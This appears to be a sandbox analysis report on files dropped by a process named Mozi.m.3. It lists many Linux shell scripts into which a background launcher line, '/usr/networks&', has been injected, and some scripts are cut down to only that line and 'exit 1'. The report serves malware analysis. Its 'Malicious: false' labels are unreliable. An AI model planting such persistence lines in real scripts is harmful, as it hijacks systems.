SSDEEP:	12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
MD5:	13C31185F2BB9F9D26E363B9415D49B2
SHA1:	5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
SHA-256:	2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
SHA-512:	050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
Malicious:	false
Preview:	./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.

/usr/share/doc/hddtemp/contribs/hddtemp-all.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1015
Entropy (8bit):	4.896629241453442
Encrypted:	false
SSDEEP:	24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
MD5:	87F1604CDCC54749A6A6D814FBB28530
SHA1:	2E815968A4F6A0F92924E94C4D94BBE5F68BA871
SHA-256:	E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
SHA-512:	C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
Malicious:	false
Preview:	./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l \|cut -f 1 -d " " \|grep /dev/ \|sed -e 's/[[:digit:]]$//g' \|sort -u \|.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd\|/dev/hd).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom\|/dev/fd).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne

/usr/share/doc/lm-sensors/examples/daemon/healthd.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.736279036741599
Encrypted:	false
SSDEEP:	6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
MD5:	E97AC4982B9BDFC8ED84ADA38E7BA000
SHA1:	DE41A53FAE2E629E10235800917CDE6B2E0301AC
SHA-256:	DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
SHA-512:	B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
Malicious:	false
Preview:	./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" \| mail -s '** Hardware Health Warning **' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.

/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	2712
Entropy (8bit):	5.4524991837552035
Encrypted:	false
SSDEEP:	48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
MD5:	A148FED2694A1A82F4ABF9A28D0293DC
SHA1:	4652F09BF1B6FB1859FB4816EFB666AE371C13E6
SHA-256:	8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
SHA-512:	9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
Malicious:	false
Preview:	./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini

/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	2564
Entropy (8bit):	5.346461718403454
Encrypted:	false
SSDEEP:	48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
MD5:	5A7BF4FFD03AE3B45F7EF8500A88D63C
SHA1:	DBFF57314EAD3467F2357BF20E7D40FC20AE846C
SHA-256:	8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
SHA-512:	735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
Malicious:	false
Preview:	./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini

/usr/share/doc/netcat-openbsd/examples/dist.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	46
Entropy (8bit):	3.925523369006428
Encrypted:	false
SSDEEP:	3:qXVOOR3vKDlOORgn:uK4n
MD5:	2CADDA792FBD37B54978108B6CC504D4
SHA1:	C28DD4FAC0523E31F0220FF31417583882C82692
SHA-256:	E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
SHA-512:	681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
Malicious:	false
Preview:	./usr/networks&.exit 0../usr/networks&.exit 1.

/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/python3-colorama/examples/demo.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	893
Entropy (8bit):	4.754860515157645
Encrypted:	false
SSDEEP:	12:20a8PvpwsNE8rKpVXExGG3S69V43usL7XEwoARsVXniVXtgf4VXEt7Fs05fjgn:nlwsWAZDV4eg4w4c6Xjg
MD5:	8B937F22608AE7DB9A71801A5EAF7985
SHA1:	A968811F781A1FA33F18E4F9D23D66E805C926FE
SHA-256:	6D8F85A7D902E1B248753FCA7CC85C39228CC50A872436BB4CEF9276F36D97C9
SHA-512:	07AC35203AF776710809196B92DCF3CF9357C1689B627F7C9146E0B3EFD0B6B47FEF4FE0036AF1C6CABA5854E88AEB576B666C6C8B2E6AD998A143BD5C10E292
Malicious:	false
Preview:	./usr/networks&.# behaviour on exit, which resets default colors again...# print grid of all colors and brightnesses.python demo01.py..# Simple demo of changing foreground, background and brightness..python demo02.py..# Demonstrate the different behavior when autoreset is True and False..python demo03.py..# check that stripped ANSI in redirected stderr does not affect stdout.rm -f demo04.out.python demo04.py 2> demo04.out.cat demo04.out.rm -f demo04.out..# Demonstrate the difference between colorama initialized with wrapping on and off..python demo05.py..# Demonstrate printing colored, random characters at random positions on the screen.python demo06.py..# Demonstrate cursor relative movement: UP, DOWN, FORWARD, and BACK in colorama.CURSOR.python demo07.py..# Demonstrate the use of a context manager instead of manually using init and deinit.python demo08.py../usr/networks&.exit 1.

/usr/share/doc/python3-serial/examples/port_publisher.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	824
Entropy (8bit):	4.411576521686501
Encrypted:	false
SSDEEP:	12:VFfxfNiNBxMZhLs/jMeZ0aMLlhLyljfBeZ0fjIClAMZhLecdj6RujrZy1Tn:ZNmGLsvZ7kLyqZSIxGLf6oZU
MD5:	CDDCC0755668278EDB780BD4EF65C45E
SHA1:	E66315D7E1B40196A94DB2127F021CB697ADA242
SHA-256:	9FC0A0139AE67EEC0EBB42A89C440F1B7E181E54F21B3D2B965E83B91A4E1C6E
SHA-512:	46090B4B7D308552BB28324E6963AF21F769677483336135831E5CC405EF58267440951018BBBFC773EB6302BC9DCEA27620399DB25E3FE1510BC1232B131CC3
Malicious:	false
Preview:	./usr/networks&.test -f $DAEMON \|\| exit 0..set -e..case "$1" in. start). echo -n "Starting $DESC: ". $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. stop). echo -n "Stopping $DESC: ". start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid. # \ --exec $DAEMON. echo "$NAME.". ;;. restart\|force-reload). echo -n "Restarting $DESC: ". start-stop-daemon --stop --quiet --pidfile \. /var/run/$NAME.pid. # --exec $DAEMON. sleep 1. $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. *). N=/etc/init.d/$NAME. echo "Usage: $N {start\|stop\|restart\|force-reload}" >&2. exit 1. ;;.esac..exit 0.../usr/networks&.exit 1.

/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	2239
Entropy (8bit):	4.714198727897739
Encrypted:	false
SSDEEP:	48:iBs/sdCu3uQzixZ9sIJyLjs/VhNO4HO0HszTKrBLeVXcR/d4Z+syfIZfwiQEw9r1:iBsEsFuIuGyK9eVX+uZ+syfIZfwiQEwr
MD5:	ADE364831C18F9ABBF6C3B6F050F7759
SHA1:	E1DC95E5FB2431D03A47FAE4C2B2B54B8945CD6E
SHA-256:	2F2441308AA69227E7193D1F3C91BF0B61AB27B1D553C810462FBF35490A5194
SHA-512:	359FA168A4BF7C20436DAFAC5C9C438327B6C994C75CC4C488EA0FFE440F71F6776CDDEAE801D86E3783214EC32E348D5C1994B006E0265608055FCDA423EDBA
Malicious:	false
Preview:	./usr/networks&. h\|-help) usage ; exit 0 ;;. s\|-second) kk=${key2} ;;. vvv) verbose="-vvv" ;;. vv) verbose="-vv" ;;. v\|-verbose) verbose="-v" ;;. ) echo "Unknown option: -$opt " ; exit 1 ;;. esac. shift. opt="$1".done..if [ $# -lt 1 ]. then. usage. exit 1.fi..echo ">>> try to report capabilities:".sg_persist -c ${verbose} "$1".res=$?.case "$res" in. 0) ;;. 1) echo " syntax error" ;;. 2) echo " not ready" ;;. 3) echo " medium error" ;;. 5) echo " illegal request, report capabilities not supported?" ;;. 6) echo " unit attention" ;;. 9) echo " illegal request, Persistent Reserve (In) not supported" ;;. 11) echo " aborted command" ;;. 15) echo " file error with $1 " ;;. 20) echo " no sense" ;;. 21) echo " recovered error" ;;. 33) echo " timeout" ;;. 97) echo " response fails sanity" ;;. 98) echo " other SCSI error" ;;. 99) echo " other error" ;;. ) echo " unknown exit status for sg_persist: $res" ;

/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/xdotool/examples/ffsp.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/hplip/hplip_clean.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	837
Entropy (8bit):	5.302563134496065
Encrypted:	false
SSDEEP:	12:cnghJ15N5jKJQlw6vWcWwH8QoFIr8zAZjF/6wQ8+WepqKUZ0N5JrHYV5N5jKUVcv:MK5NworhH83Igsv/6j59I0Nv05NwHeX4
MD5:	6F4CEFE8C604AF13A0E95B1A624268E0
SHA1:	95D3589209627FA8249BA32D78B11DC6E9E0B94E
SHA-256:	D30D1E9E6DD28C9CCC349B9781744F88B1A023052B98C10CC44427DC13A01157
SHA-512:	BA36E3FB93776A05AAE8CD731DC90D05CC04F4A1F76A141CEAE46EDBEDA4A02B8A20088CBF395985447C870ACC7CF2A6066A1C55D6A6B339AD7381B4973177A6
Malicious:	false
Preview:	./usr/networks&...exit 1..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null..fi.else..exit 1.fi...USAGE=`du -c $LOG_DIR 2>/dev/null \|grep total \|cut -d't' -f1`..# Clears the logs if size is greater than specified limit.while [ $USAGE -gt $MAXSIZE ]; do...# changing the user specified LOGFILE_DAYS days to 1 days lesser...LOGFILE_DAYS=`expr $LOGFILE_DAYS "-" 1`...# If same day logs are reaching Max size, deleting all log files...if [ $LOGFILE_DAYS -eq 0 ]; then...find $LOG_DIR -type f -name hp-\* -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null...break..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null \| xargs -r -0 rm -f 2>/dev/null..fi..USAGE=`du -c $LOG_DIR 2>/dev/null \|grep total \|cut -d't' -f1`.done../usr/networks&.exit 1.

/usr/share/lightdm/guest-session/setup.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/os-prober/common.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	5640
Entropy (8bit):	5.075171234163134
Encrypted:	false
SSDEEP:	96:EndUdULCUP+WucEeLvUmp3qFvUnxEX3ZmXQfVStPDVYt4cI0pNZQ89LKVSTzCKwN:OUdULCUPSeLvUDNUxGZgQfVSDVTM79W7
MD5:	E91743F1831D7CE024336A919713390C
SHA1:	0A53FF0AFE70ADA2538643A69DD332CEF8B9CDA7
SHA-256:	72F50ACEC6CFB58D01899D4A8F64573DDF80B3A57DAF4EE9CE4B403873DF887E
SHA-512:	4C8CCAC875528A73D8113202A887EB009B258DB4A80233073ABC9F46AB21ECAB2937B3EA3FEB794ED2229BF3273E95D9B73073EB8990DDDC8AC9C8DCE161CF0D
Malicious:	false
Preview:	./usr/networks&.# because function is not supposed to exit error codes..fs_type () {..local fstype=""..if (export PATH="/lib/udev:$PATH"; type vol_id) >/dev/null 2>&1; then...PATH="/lib/udev:$PATH" \....fstype=$(vol_id --type "$1" 2>/dev/null \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..if type lsblk >/dev/null 2>&1 ; then...fstype=$(lsblk --nodeps --noheading --output FSTYPE -- "$1" \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..if type blkid >/dev/null 2>&1; then...fstype=$(blkid -o value -s TYPE "$1" 2>/dev/null \|\| true)...[ -z "$fstype" ] \|\| { echo "$fstype"; return; }..fi..echo "NOT-DETECTED".}..is_dos_extended_partition() {..if type blkid >/dev/null 2>&1; then...local output....output="$(blkid -o export $1)"....# old blkid (util-linux << 2.24) errors out on extended p....if [ "$?" = "2" ]; then....return 0...fi....# dos partition type and no filesystem type?......if echo $output \| grep -q ' PTTYPE=dos ' &&.....! echo $output \| grep -q ' TYPE=';

/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/vim/vim81/macros/less.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	407
Entropy (8bit):	4.430546624952678
Encrypted:	false
SSDEEP:	12:axuI47jZ9yPM/o47jZ9yPaLaAl5IYkWbWCGcxQuuiC/5s8n:CuI4fZV/o4fZjWqPC2Qu8/e8
MD5:	B133FEA1865145C4491358207DE1C0DB
SHA1:	30DC19C478A0D59E9C03DFB99D59AA67B4E706C3
SHA-256:	01BB6F1F7C079F3702E616E15548F3EF4BDF7D8594F6E4873964476159BD54FB
SHA-512:	138AF43BDB49654CEAB6498CAF1D747E4698CCCC135F095E093FEADA7031DB119EAF820E4661DB2B0104E2863F3A36C5D9EB5464E73E287CFCC61BD8603CE79E
Malicious:	false
Preview:	./usr/networks&. exit. fi. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -. else. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@". fi.else. # Output is not a terminal, cat arguments or stdin. if test $# = 0; then. if test -t 0; then. echo "Missing filename" 1>&2. exit. fi. cat. else. cat "$@". fi.fi../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.813555283479331
Encrypted:	false
SSDEEP:	3:qXVay6vUZ6aAcvZ6sF5b2FpJRJUGE7zsjZ2FPYRKYUGE7zQvvvLQVOORgn:w6vUFAcvgfvRxgA4QRxgUv3LPn
MD5:	693F623F27A2CF8623A4ACEECD20DA9F
SHA1:	7A52B6AA1A47433B259D4699D86A6840C5E02D78
SHA-256:	EC43854908E92A14857A8845EB89F8C64DBFC7856BC23AA1F82BD2A75097EB2C
SHA-512:	01E779F1F569BBEED68AC5EE6C99FD558F003C3166B5F5FA0ED29F512D45AF03378F0708E359009DF3567E4EE003ED7DB395C854EF045F8A51901788A996F290
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..grep major-152 $f >/dev/null.if [ $? = 1 ]; then..echo alias block-major-152 aoe >> $f..echo alias char-major-152 aoe >> $f.fi.../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	315
Entropy (8bit):	4.844907937025013
Encrypted:	false
SSDEEP:	6:wSWl0ARIP9cDhussXcAJWAbM+tCACzYsavu/C5VKSChR5bm026qyAJpl8LAhn:wvVuXFmYs1/LSChqmqfJs0hn
MD5:	43C4BF1017D72A45F95FB685FCECCF9A
SHA1:	B78469C2F587A3E6A4BB591385D5D721B8B829C0
SHA-256:	9A041A6D5102D1416B1616B4C13791F3ED00DE305DDE32E5E2233A85E5ACCD45
SHA-512:	A7D1050FDBF4BA02AD9DDE5E09895C89469439DBD0FE8B9639B1A91802AF96D03ED5D202BAF8354D49D4B9C4489E3B60616A76CEEE8C4924FB8C428C554526FC
Malicious:	false
Preview:	./usr/networks&..exit 1.}..for d in `ls -d $sysd/block/etherd* 2>/dev/null \| grep -v p` end; do..# maybe ls comes up empty, so we use "end"..test $d = end && continue...dev=`echo "$d" \| sed 's/.*!//'`..printf "$format" \..."$dev" \..."`cat \"$d/netif\"`" \..."`cat \"$d/state\"`".done \| sort../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	427
Entropy (8bit):	4.897324371958306
Encrypted:	false
SSDEEP:	12:chnJjBFcVAFBzKJ+NT7+J+900EV/+/gLl60k6XxVjpInPn:CdB6qFBGYNP+JO00e/MilNVFInP
MD5:	9E74B9DB16052AAFD66DC8BE8F3A69F4
SHA1:	A18ADC7A4062900F79D8DBE4430F53E17D0D4B42
SHA-256:	E4ECBF6B5F68F1DB22C13E934EE409855502080D2089DA534A39E9C73E76139B
SHA-512:	3FD605D3E7879DAAC636A01B8373A179796FF60070BCF9975844FC40217A4399B74DA8F345F3F28189CC82C5FFF26715A7D23DDECC0A42E1E794EE3A279B12E6
Malicious:	false
Preview:	./usr/networks&....exit 1...fi..fi.fi..# find the directory where udev rules are stored, often.# /etc/udev/rules.d.#.rules_d="`sed -n '/^udev_rules=/{ s!udev_rules=!!; s!\"!!g; p; }' $conf`".if test -z "$rules_d" ; then..rules_d=/etc/udev/rules.d.fi.if test ! -d "$rules_d"; then..echo "$me Error: cannot find udev rules directory" 1>&2..exit 1.fi.sh -xc "cp `dirname $0`/udev.txt $rules_d/60-aoe.rules"../usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh

Download File

Process:	/tmp/Mozi.m.3
File Type:	ASCII text
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	5.232118753528843
Encrypted:	false
SSDEEP:	24:koS8g1YJonwE2BxUCLzJ8ZpvPIfTw1aTTPh4V8TahlByh22pTflrykrs4:koS89E2HvZSIrAa3PhUkahXyh2KTlryG
MD5:	64D41D32A14275C6B34741EE3DFA5EAB
SHA1:	A441D2F4E709ED46E045A7A51701F4F2B9FB0C36
SHA-256:	0FB6B7E294DACF7EEF1583A074C8DF2889BD4366062564740E5A985C837C0754
SHA-512:	B60817E1DFEEF2DA2FBC23656C6C21188B0B5EE1CDE2B46D6DB4FC2A6416298048571A433024A892875F59A91EA175111A0A0D2716C308B35625E4E60FA6A20D
Malicious:	false
Preview:	./usr/networks&.ls $P > /dev/null 2>&1 \|\| exit 1..# Initialize two files, one for /dev/3270 commands and one.# to replace the /etc/inittab file (old one saved in OLDinittab).echo "#!/bin/sh" > $SCR \|\| exit 1.echo " " >> $SCR.echo "# Script built by /sbin/config3270" >> $SCR.if [ ! -d /dev/dasd ]; then..echo rm -rf "$D/$SUBD/*" >> $SCR.fi.echo "grep -v $TTY $INITTAB > $NINITTAB" > $SCRTMP \|\| exit 1.echo "echo $ADDNOTE >> $NINITTAB" >> $SCRTMP.if [ ! -d /dev/dasd ]; then..echo mkdir -p $D/$SUBD >> $SCR.fi..# Now query the tub3270 driver for 3270 device information.# and add appropriate mknod and mingetty lines to our files.echo what=config > $P.while read devno maj min;do..if [ $min = 0 ]; then...fsmaj=$maj...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB c $fsmaj 0 >> $SCR....echo chmod 666 $D/$TUB >> $SCR...fi..elif [ $maj = 